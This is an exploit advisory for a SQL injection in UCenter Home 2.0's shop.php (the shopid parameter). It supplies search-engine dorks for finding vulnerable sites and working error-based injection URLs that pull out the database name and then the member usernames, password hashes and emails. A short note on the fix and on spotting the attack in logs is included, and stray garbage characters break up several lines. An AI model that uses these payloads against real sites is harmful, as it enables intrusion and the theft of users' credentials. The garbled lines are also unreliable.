__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
1 s0 ~$ w1 R E) `
2 t4 n" m$ }: i! l0 E2 _7 ~4 h) QDork : Powered by UCenter inurl:shop.php?ac=view
! \. I8 O* v( A. G1 o9 P- q- z, T8 A! ]" U
Dork 2 : inurl:shop.php?ac=view&shopid= D9 |" q# z7 b$ _# g E# S8 ?
" K. K2 [. J5 @0 Z! Z. x6 r8 Z
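__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Parameters : (?)ac=view&shopid=

Vulnerability type : SQL Injection (MySQL error-based)

Required materials : Hex conversion

Note: the shopid value appears to reach the MySQL query without integer validation or parameter binding, and the error-based technique depends on the application returning database error text to the client; casting shopid to an integer (or binding it as a parameter) and suppressing database error output address both. In web server logs, requests to shop.php whose shopid holds SQL keywords or information_schema instead of a plain number are the indicator to look for.
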
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- Z* u; y: `2 k' l
; s" P7 U, n j" Q2 P) C1 dYour Need victim Database name. 7 C+ o/ u0 |" T+ L, m! ?
; H* J3 G/ q- j, K" v3 dfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 9 {1 V( E+ g( b" I* {9 Y
/ i* t4 ?1 E1 Z+ @7 a.. / l5 `- e* g& k& s
0 ~- u1 t* b" t! C5 E
DB : Okey.
" U& G( S2 A" w2 ]- F1 }; U, m- T- T. N1 ~ @) p# I% O+ t6 |# i
your edit DB `[TARGET DB NAME]`
, z5 a3 ^$ [$ y! T7 _5 S O! K5 q1 a* _
Example : 'hiwir1_ucenter'
) Y$ ]& Q) ?/ I
8 e: I$ S8 e N4 y5 uEdit : Okey.
$ m5 q; F* k( B2 b( y/ G$ W6 ~
4 h* I" K. n1 y1 N. d. cYour use Hex conversion. And edit Your SQL Injection Exploit.. ) _4 _! C7 l8 Q3 Y' k# J, U7 u
) N: Q+ x8 [( b6 r. K5 b' j9 P
$ F" j# p7 C' k4 z+ y% B' n+ o; S8 ?. x( F3 {
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
5 w% X- z! p) _- q6 I1 a |